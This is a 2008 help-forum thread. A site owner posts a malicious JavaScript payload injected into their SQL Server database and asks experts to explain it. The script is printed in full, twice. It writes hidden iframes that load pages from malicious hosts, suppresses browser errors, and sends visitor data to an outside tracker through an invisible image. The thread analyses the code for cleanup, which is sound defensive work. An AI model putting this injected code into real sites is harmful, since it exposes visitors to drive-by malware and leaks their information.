Solved

sql injection js script, can someone tell me what this is doing?

Posted on 2008-06-09
Last Modified: 2008-06-10
Our SQL Server DB was infected with some sort of SQL injection - I downloaded the .js and it is as follows:

// Stage 1: writes a 100x1-pixel iframe that loads 456.htm from www.killpp[.]cn.
// At that size the visitor sees essentially nothing, but the browser still
// fetches and renders whatever that remote page serves.
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");

// Stage 2: a second iframe (height 0, dj.htm on www.qiqicc[.]cn) is written
// unless navigator.systemLanguage equals 'zh-cn'. systemLanguage is an
// Internet Explorer property; where it is undefined the comparison is false
// and the else branch runs.
if (navigator.systemLanguage=='zh-cn')
{

}
else{
document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");
}



// Returning true from window.onerror suppresses the browser's script-error
// reporting, so a failure anywhere in the injected code stays invisible.
window.onerror=function(){return true};
// Stage 3: writes a chain of <script> elements that act as a visit counter
// reporting to web.51[.]la (go.asp, id=1933327):
//   - reads this page's URL and referrer, plus the referrer of the parent and
//     top windows, screen colour depth, screen size and timezone offset;
//   - keeps a page counter in the AJSTAT_ok_pages cookie (expires one hour
//     ahead) and a counter in AJSTAT_ok_times (expiry pushed a further 365
//     days) that is incremented only when the page counter has restarted at 1;
//   - sends all of it as query parameters of a 0x0-pixel <img>.
// NOTE(review): each top/parent access sits in its own <script> element,
// presumably so a cross-frame access error in one does not stop the rest;
// confirm.
// For cleanup, the hostnames and cookie names in this sample are the strings
// to search for in database text columns and in proxy/web logs.
document.write ('<script>var a3327tf="51la";var a3327pu="";var a3327pf="51la";var a3327su=window.location;var a3327sf=document.referrer;var a3327of="";var a3327op="";var a3327ops=1;var a3327ot=1;var a3327d=new Date();var a3327color="";if (navigator.appName=="Netscape"){a3327color=screen.pixelDepth;} else {a3327color=screen.colorDepth;}<\/script><script>a3327tf=top.document.referrer;<\/script><script>a3327pu =window.parent.location;<\/script><script>a3327pf=window.parent.document.referrer;<\/script><script>a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));a3327ops=(a3327ops==null)?1: (parseInt(unescape((a3327ops)[2]))+1);var a3327oe =new Date();a3327oe.setTime(a3327oe.getTime()+60*60*1000);document.cookie="AJSTAT_ok_pages="+a3327ops+ ";path=/;expires="+a3327oe.toGMTString();a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));if(a3327ot==null){a3327ot=1;}else{a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);document.cookie="AJSTAT_ok_times="+a3327ot+";path=/;expires="+a3327oe.toGMTString();<\/script><script>a3327of=a3327sf;if(a3327pf!=="51la"){a3327of=a3327pf;}if(a3327tf!=="51la"){a3327of=a3327tf;}a3327op=a3327pu;try{lainframe}catch(e){a3327op=a3327su;}document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');<\/script>');

Could someone tell me exactly what this is doing?

Thanks in advance.
Question by:samic400

Expert Comment

by:ysfx
ID: 21744909
Looks like code that sites use to track traffic from a different domain. My guess is that this is an attempt to circumvent sites that publish user input, such as blogs and feedback forms.

Accepted Solution

by:
NizzeK earned 500 total points
ID: 21748375
You are not alone with this problem:
http://www.daniweb.com/forums/post614041.html
This is a Chinese attempt to gather information for malicious use.
See: http://www.sudosecure.net/archives/83

The code checks your pages and creates cookies (AJSTAT_ok_pages/AJSTAT_ok_times) with time stamp and availability information. It is then written out in the guise of a utility, sending the collected information and identity to the data collector at web.51.la.
This tracking portion is not harmful in itself, but it could reveal something unwanted. (The two hidden iframes at the top are a separate matter, since they load content from other sites.)
I have reformatted the code to make the structure easier to see.

Best regards
Nils


// Writes a 100x1-pixel iframe that loads 456.htm from www.killpp[.]cn; the
// frame is effectively invisible but its content is still fetched and rendered.
document.writeln("<iframe src=http:\/\/www.killpp.cn\/456.htm width=100 height=1><\/iframe>");
 

// Second iframe (height 0, dj.htm on www.qiqicc[.]cn) is written unless
// navigator.systemLanguage equals 'zh-cn'; the 'zh-cn' branch is empty.
if (navigator.systemLanguage=='zh-cn')

{
 

}

else{

document.writeln("<iframe src=http:\/\/www.qiqicc.cn\/dj.htm width=100 height=0><\/iframe>");

}
 

// Returning true from window.onerror suppresses the browser's script-error
// reporting, hiding any failure of the injected code from the visitor.
window.onerror=function(){return true};

// Reading aid only: this is the single document.write('...') call from the
// original sample with line breaks inserted inside the string literal (and
// inside the two cookie strings), so it is not runnable JavaScript as shown.
// Everything between the outer quotes is markup that the call writes into the
// page, namely six <script> elements that together act as a visit counter
// reporting to web.51[.]la:
//   1. declares the a3327* variables and records screen colour depth;
//   2-4. read top.document.referrer, window.parent.location and
//        window.parent.document.referrer, one access per <script> element
//        (NOTE(review): presumably so a cross-frame access error in one does
//        not stop the others; confirm);
//   5. maintains the AJSTAT_ok_pages cookie (page counter, expiry one hour
//      ahead) and the AJSTAT_ok_times cookie (expiry pushed a further 365
//      days), the latter incremented only when the page counter is back at 1;
//   6. picks a referrer and page URL and writes a 0x0-pixel <img> whose src is
//      go.asp on web.51[.]la (id=1933327) carrying the counters, timezone
//      offset, colour depth, screen size, referrer and page URL.
// The hostname and cookie names here are the strings to search for when
// checking logs and stored content for this injection.
document.write ('

	<script>

		var a3327tf="51la";

		var a3327pu="";

		var a3327pf="51la";

		var a3327su=window.location;

		var a3327sf=document.referrer;

		var a3327of="";

		var a3327op="";

		var a3327ops=1;

		var a3327ot=1;

		var a3327d=new Date();

		var a3327color="";

		if (navigator.appName=="Netscape")

			     {a3327color=screen.pixelDepth;} 

			else {a3327color=screen.colorDepth;}

	<\/script>

	<script>

		a3327tf=top.document.referrer;

	<\/script>

	<script>

		a3327pu =window.parent.location;

	<\/script>

	<script>

		a3327pf=window.parent.document.referrer;

	<\/script>

	<script>

		a3327ops=document.cookie.match(new RegExp("(^| )AJSTAT_ok_pages=([^;]*)(;|$)"));

		a3327ops=(a3327ops==null)?1:(parseInt(unescape((a3327ops)[2]))+1);

		var a3327oe =new Date();

		a3327oe.setTime(a3327oe.getTime()+60*60*1000);

		document.cookie="AJSTAT_ok_pages="+a3327ops+ ";

			path=/;

			expires="+a3327oe.toGMTString();

		a3327ot=document.cookie.match(new RegExp("(^| )AJSTAT_ok_times=([^;]*)(;|$)"));

		if (a3327ot==null)

			     {a3327ot=1;}

			else {a3327ot=parseInt(unescape((a3327ot)[2])); a3327ot=(a3327ops==1)?(a3327ot+1):(a3327ot);}

		a3327oe.setTime(a3327oe.getTime()+365*24*60*60*1000);

		document.cookie="AJSTAT_ok_times="+a3327ot+";

			path=/;

			expires="+a3327oe.toGMTString();

	<\/script>

	<script>

		a3327of=a3327sf;

		if (a3327pf!=="51la")

			     {a3327of=a3327pf;}

		if(a3327tf!=="51la")

			     {a3327of=a3327tf;}

		a3327op=a3327pu;

		try{lainframe}catch(e){a3327op=a3327su;}

		document.write(\'<img style="width:0px;height:0px" src="http://web.51.la/go.asp?we=A-Free-Service-for-Webmasters&svid=12&id=1933327&tpages=\'

			+a3327ops+\'&ttimes=\'+a3327ot+\'&tzone=\'+(0-a3327d.getTimezoneOffset()/60)+\'&tcolor=\'+a3327color+\'&sSize=\'

			+screen.width+\',\'+screen.height+\'&referrer=\'+escape(a3327of)+\'&vpage=\'+escape(a3327op)+\'" \/>\');

	<\/script>');


Expert Comment

by:NizzeK
ID: 21748394
But to start with, it gets page 456.htm, and that one has the malicious 4562.swf, see more:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527?logdate=200808